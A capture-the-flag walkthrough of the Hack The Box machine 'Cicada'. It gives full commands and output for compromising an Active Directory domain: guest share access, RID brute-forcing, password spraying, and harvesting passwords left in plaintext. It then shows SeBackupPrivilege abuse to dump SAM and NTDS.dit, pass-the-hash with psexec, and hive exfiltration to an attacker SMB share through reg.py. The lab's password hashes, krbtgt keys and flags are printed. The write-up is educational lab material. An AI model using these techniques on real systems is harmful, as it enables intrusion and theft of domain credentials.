Command Palette

Search for a command to run...

Blog
Next

Cicada - Walkthrough

Cicada is an easy-difficulty Windows machine that focuses on beginner Active Directory enumeration and exploitation. Players enumerate the domain, identify users, navigate shares, uncover plaintext passwords stored in files, execute a password spray, and use the SeBackupPrivilege to achieve full system compromise.

Reconnaissance

Nmap

We start with a standard service scan against the target:

sudo nmap -sC -sV -Pn 10.129.231.149 -oN cicada.nmap
PORTSTATESERVICEVERSION
53/tcpopendomainSimple DNS Plus
88/tcpopenkerberos-secMicrosoft Windows Kerberos
135/tcpopenmsrpcMicrosoft Windows RPC
139/tcpopennetbios-ssnMicrosoft Windows netbios-ssn
389/tcpopenldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb)
445/tcpopenmicrosoft-ds
464/tcpopenkpasswd5
593/tcpopenncacn_httpMicrosoft Windows RPC over HTTP 1.0
636/tcpopenssl/ldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb)
3268/tcpopenldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb)
3269/tcpopenssl/ldapMicrosoft Windows Active Directory LDAP (Domain: cicada.htb)
5985/tcpopenhttpMicrosoft HTTPAPI httpd 2.0 (WinRM)

Kerberos (88) and LDAP (389/636/3268/3269) confirm we're dealing with a Domain Controller. The LDAP service info and the SSL certificate's commonName both point to the domain cicada.htb and the host CICADA-DC, so we register both in /etc/hosts:

echo "10.129.231.149 cicada.htb CICADA-DC CICADA-DC.cicada.htb" | sudo tee -a /etc/hosts

There is no web server exposed, so with a Domain Controller in front of us the natural next step is SMB enumeration.

SMB — Anonymous / Guest Access

An unauthenticated session is rejected outright, but the built-in guest account with a blank password succeeds. crackmapexec is EOL, so throughout this box we ran everything in parallel with its actively-maintained successor, netexec (nxc), to compare behavior — both are shown below.

crackmapexec smb cicada.htb --shares
SMB   cicada.htb   445   CICADA-DC   [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
crackmapexec smb cicada.htb -u 'guest' -p '' --shares
SMB   cicada.htb   445   CICADA-DC   [+] cicada.htb\guest:
SMB   cicada.htb   445   CICADA-DC   [+] Enumerated shares
Share      Permissions   Remark
-----      -----------   ------
ADMIN$                   Remote Admin
C$                       Default share
DEV
HR         READ
IPC$       READ          Remote IPC
NETLOGON                 Logon server share
SYSVOL                   Logon server share

guest lands us read access on HR (line 8) and visibility — but not yet read — on DEV (line 7).

Same share layout either way — from here on we'll keep showing both tools side by side for comparison.

The guest account has read access to HR. DEV is visible but not yet readable — we'll come back to it once we have proper credentials.

HR Share — Default Password Disclosure

We connect with smbclient and grab the only file in the share:

smbclient //cicada.htb/HR -N
smb: \> get "Notice from HR.txt"
Notice from HR.txt
Dear new hire!
 
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our
security protocols, it's essential that you change your default password to
something unique and secure.
 
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
 
To change your password:
 
1. Log in to your Cicada Corp account using the provided username and the
default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change
Password".
4. Follow the prompts to create a new password. Make sure your new password is
strong, containing a mix of uppercase letters, lowercase letters, numbers, and
special characters.
5. After changing your password, make sure to save your changes.
 
Remember, your password is a crucial aspect of keeping your account secure.
Please do not share your password with anyone, and ensure you use a complex
password.
 
If you encounter any issues or need assistance with changing your password,
don't hesitate to reach out to our support team at [email protected].
 
Thank you for your attention to this matter, and once again, welcome to the
Cicada Corp team!
 
Best regards,
Cicada Corp

This is a classic onboarding-document leak: line 7 hands out a default domain password, Cicada$M6Corpb*@Lp#nZp!8, to every new hire, with no guarantee everyone actually changed it as instructed. That makes it an excellent candidate for a password spray — but first we need a list of valid usernames to try it against.

Domain User Enumeration — RID Cycling

Every AD object — user, group, or machine account — has a unique SID (Security Identifier), formed by concatenating the domain SID with a RID (Relative Identifier). RIDs are assigned sequentially, and critically, resolving a SID to a name only requires an authenticated (even anonymous/guest) session, not any special privilege. So with just a guest session we can brute-force RIDs from 0 upward against the domain SID and enumerate every object in the domain, including usernames. netexec has a built-in module for this:

nxc smb 10.129.231.149 -u '.' -p '' --rid-brute
SMB   10.129.231.149   445   CICADA-DC   [+] cicada.htb\.: (Guest)
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

The 9 highlighted lines are every SidTypeUser entry — everything else is a group or alias, useless for a password spray. Of those 9, four are built-in/machine accounts (Administrator, Guest, krbtgt, the CICADA-DC$ machine account) and the remaining five — john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars — are the real human users we actually want to spray.

The same result can be obtained with Impacket's lookupsid.py, piping the SidTypeUser entries straight into a wordlist:

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt
users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

The first four lines are built-in/machine accounts we can ignore for the spray; the five highlighted lines are the real human users worth targeting.

Foothold

Password Spraying

We spray the default password from the HR notice against every user we just enumerated:

crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Line 7 in both outputs is the only [+] (success) among five STATUS_LOGON_FAILURE attempts: michael.wrightson never rotated the default password out. We now have a valid, if low-privilege, domain account.

AD Description Field — Plaintext Password Disclosure

michael.wrightson has no useful share access, but valid domain credentials let us enumerate the full user list — including the description field, which administrators sometimes (mis)use as a scratchpad. nxc formats this as a proper table instead of crackmapexec's one-line-per-user dump, which makes the description field easier to spot at a glance:

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB   cicada.htb   445   CICADA-DC   cicada.htb\emily.oscars           badpwdcount: 0 desc:
SMB   cicada.htb   445   CICADA-DC   cicada.htb\david.orelious         badpwdcount: 0 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB   cicada.htb   445   CICADA-DC   cicada.htb\michael.wrightson      badpwdcount: 0 desc:
SMB   cicada.htb   445   CICADA-DC   cicada.htb\sarah.dantelia         badpwdcount: 1 desc:
SMB   cicada.htb   445   CICADA-DC   cicada.htb\john.smoulder          badpwdcount: 1 desc:

The highlighted line is david.orelious — he left his password, aRt$Lp#7t*VQ!3, in plaintext right in the AD description field. This field is meant for free-text notes about the account and is readable by any authenticated user, which is exactly why it's such a common (mis)used scratchpad for "just in case I forget" notes.

DEV Share — Backup Script

Re-checking share access with David's credentials, the DEV share now grants read access:

crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
Share   Permissions   Remark
-----   -----------   ------
DEV     READ
HR      READ

DEV flips from invisible-permission to READ with David's credentials — that's our next target:

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> get Backup_script.ps1
Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
 
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

This is a scheduled task that zips C:\smb for backup purposes and, to do so unattended, builds a PSCredential from a hardcoded plaintext password (lines 4-5): Q!3@Lp#M6b*7t*Vt, for emily.oscars. Automating a task like this without a proper credential vault is a very common real-world mistake.

WinRM Access

emily.oscars is a member of the Remote Management Users group, so we connect directly with Evil-WinRM:

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt

User flag: 6a039bc32a912d2ae6303066bb94e642

Post-Exploitation

Privilege Enumeration

We check what rights the current token carries:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Lines 6-7 are what matter here: emily.oscars holds SeBackupPrivilege and its counterpart, SeRestorePrivilege. Both are meant to let trusted backup software read and write any file on the filesystem regardless of ACLs — including files that are normally locked or access-restricted, like the registry hives that back the SAM database. Handing this privilege to a regular user account is effectively equivalent to granting local admin, since it turns "backup" into "read anything I want."

Privilege Escalation

SeBackupPrivilege Abuse — Dumping the Local SAM

The most direct way to weaponize SeBackupPrivilege is to use the built-in reg save command to export the SAM and SYSTEM registry hives to disk. SAM stores the local accounts and their NTLM hashes; SYSTEM stores the boot key needed to decrypt them.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\sam sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\system system
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download system

With both files local, Impacket's secretsdump.py decrypts the hashes offline:

impacket-secretsdump -sam sam -system system local
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Each line follows username:rid:lmhash:nthash. The lmhash field (aad3b435...) is the constant value for an empty/disabled LM hash — modern Windows doesn't compute real LM hashes — so the part we actually care about is the nthash. Line 3 gives us the local Administrator NTLM hash: 2b87e7c93a3e8a0ea4a581937016f341 — usable for authentication as-is via Pass-the-Hash, no cracking required.

Pass-the-Hash

NTLM hashes are usable for authentication without ever recovering the plaintext password. We pass it straight to Evil-WinRM:

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt

Root flag: 59db75e16bd4c1c497304f8438ecf1b3

Going Further — Full Domain Compromise via Volume Shadow Copy

The SAM hive only yields local account hashes. Since CICADA-DC is a Domain Controller, the domain account database actually lives in NTDS.dit on the C: volume — a file that is permanently locked by the OS and can't be read directly, even with SeBackupPrivilege, because reg save only works against the registry, not arbitrary files.

The standard way around this is to abuse SeBackupPrivilege together with the Volume Shadow Copy Service: creating a shadow copy gives us a frozen, read-only snapshot of the volume that bypasses the file lock entirely. We drive this with diskshadow, a built-in Windows utility, using a script:

diskshadow.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

Line 6 selects C: as the volume to snapshot, and line 8 is the actual payoff — it exposes that frozen snapshot as a brand-new drive letter, E:, that we can read from freely. This technique is documented in Elevating Privileges with SeBackupPrivilege on Windows, which is where this diskshadow script comes from.

The one catch: diskshadow expects DOS-style (\r\n) line endings, and silently fails to parse a script written with plain Unix (\n) endings. xxd makes the difference obvious — every 0a (LF) needs to become 0d0a (CRLF):

xxd diskshadow.txt
00000000: 7365 7420 7665 7262 6f73 6520 6f6e 0a73  set verbose on.s
00000010: 6574 206d 6574 6164 6174 6120 433a 5c57  et metadata C:\W
00000020: 696e 646f 7773 5c54 656d 705c 6d65 7461  indows\Temp\meta
00000030: 2e63 6162 0a73 6574 2063 6f6e 7465 7874  .cab.set context
00000040: 2063 6c69 656e 7461 6363 6573 7369 626c   clientaccessibl
00000050: 650a 7365 7420 636f 6e74 6578 7420 7065  e.set context pe
00000060: 7273 6973 7465 6e74 0a62 6567 696e 2062  rsistent.begin b
00000070: 6163 6b75 700a 6164 6420 766f 6c75 6d65  ackup.add volume
00000080: 2043 3a20 616c 6961 7320 6364 7269 7665   C: alias cdrive
00000090: 0a63 7265 6174 650a 6578 706f 7365 2025  .create.expose %
000000a0: 6364 7269 7665 2520 453a 0a65 6e64 2062  cdrive% E:.end b
000000b0: 6163 6b75 700a                           ackup.

Line 1 shows it plainly: on 0a 73 — a bare 0a between on and set. We convert with unix2dos and diff the same file:

unix2dos diskshadow.txt
xxd diskshadow.txt
00000000: 7365 7420 7665 7262 6f73 6520 6f6e 0d0a  set verbose on..
00000010: 7365 7420 6d65 7461 6461 7461 2043 3a5c  set metadata C:\
00000020: 5769 6e64 6f77 735c 5465 6d70 5c6d 6574  Windows\Temp\met
00000030: 612e 6361 620d 0a73 6574 2063 6f6e 7465  a.cab..set conte
00000040: 7874 2063 6c69 656e 7461 6363 6573 7369  xt clientaccessi
00000050: 626c 650d 0a73 6574 2063 6f6e 7465 7874  ble..set context
00000060: 2070 6572 7369 7374 656e 740d 0a62 6567   persistent..beg
00000070: 696e 2062 6163 6b75 700d 0a61 6464 2076  in backup..add v
00000080: 6f6c 756d 6520 433a 2061 6c69 6173 2063  olume C: alias c
00000090: 6472 6976 650d 0a63 7265 6174 650d 0a65  drive..create..e
000000a0: 7870 6f73 6520 2563 6472 6976 6525 2045  xpose %cdrive% E
000000b0: 3a0d 0a65 6e64 2062 6163 6b75 700d 0a    :..end backup..

Line 1 now reads on 0d0a 73 — every line break in the file gained a 0d byte, growing the file from 0xb6 to 0xbf bytes (9 extra bytes, one per line) for the same 9 lines of content. Only now will diskshadow /s parse the script correctly.

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload diskshadow.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> diskshadow /s diskshadow.txt

This creates a shadow copy of C: and exposes it as a new E: drive. NTDS.dit is now readable through that snapshot, so we copy it out with robocopy (/b for the required backup-semantics read):

*Evil-WinRM* PS C:\Users\Administrator\Documents> robocopy /b E:\Windows\ntds . ntds.dit
*Evil-WinRM* PS C:\Users\Administrator\Documents> download ntds.dit

We already have the SYSTEM hive from earlier, so secretsdump.py can decrypt the full domain database, including Kerberos keys for every account:

secretsdump.py local -system system -ntds ntds.dit
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8
[*] Cleaning up...

This dump is a strictly stronger foothold than the local SAM dump. Line 6 gives the same Administrator NTLM hash we already had, but line 9 adds krbtgt — the account whose key signs every Kerberos ticket in the domain, which is what makes Golden Ticket forgery possible. Lines 16-17 go a step further and give us the AES Kerberos keys for both accounts, which are what modern (Kerberos-only, NTLM-restricted) environments actually require for ticket forgery instead of the raw NTLM hash.

The Administrator hash alone is already enough to confirm full control. netexec flags the host as pwned:

nxc smb 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
SMB   10.129.231.149   445   CICADA-DC   [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)

And we can drop straight into an interactive SYSTEM shell with Impacket's psexec.py, which uploads a temporary service binary over ADMIN$, registers it as a Windows service, and starts it to get a cmd.exe running as NT AUTHORITY\SYSTEM:

psexec.py -hashes 2b87e7c93a3e8a0ea4a581937016f341:2b87e7c93a3e8a0ea4a581937016f341 [email protected]
[*] Found writable share ADMIN$
[*] Uploading file KRDvNjra.exe
[*] Starting service sJNc.....
C:\Windows\system32>

Alternative — Remote Hive Save with Impacket's reg.py

Everything above pulled the hives out through Evil-WinRM's own download command, which reads the file over the existing WinRM/HTTP channel. Impacket ships an alternative: reg.py's backup action drives the same reg save operation remotely over RPC, but instead of writing the hive to local disk on the target, it can push it directly to an attacker-controlled SMB share, skipping the local file entirely.

First we stand up a listener with impacket-smbserver:

sudo impacket-smbserver -smb2support share $(pwd)

Then we point reg.py at it, authenticating as emily.oscars and passing our share as the backup destination:

reg.py 'cicada.htb/emily.oscars:Q!3@Lp#M6b*7t*Vt'@10.129.231.149 backup -o //10.10.14.246/share
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to //10.10.14.246/share\SAM.save
[*] Saved HKLM\SYSTEM to //10.10.14.246/share\SYSTEM.save
[*] Saved HKLM\SECURITY to //10.10.14.246/share\SECURITY.save

reg.py triggers the RemoteRegistry service via a named pipe if it isn't already running, then performs the same reg save we did manually against SAM and SYSTEM — plus SECURITY, which holds cached domain secrets (LSA secrets, DPAPI machine keys) that reg save hklm\sam/hklm\system alone never touched. In principle this is strictly more capable and saves a manual step, since the files land straight on our machine.

Why we didn't end up using it here: smbserver.py is a pure-Python SMB server meant for convenience, not throughput — it single-threads each connection and has no production-grade buffering. Against a small file like SAM/SYSTEM/SECURITY it's fine, but for the 16MB NTDS.dit in the full domain dump above it repeatedly stalled and dropped the connection mid-transfer. It also opens a second attack surface: the target must be able to reach back to our SMB port (445 or a custom one), which can be blocked by egress filtering in ways a WinRM download — riding the connection we already have open — never runs into. For small, one-shot hive dumps reg.py is a fine shortcut; for anything larger, Evil-WinRM's download was the more reliable path in practice.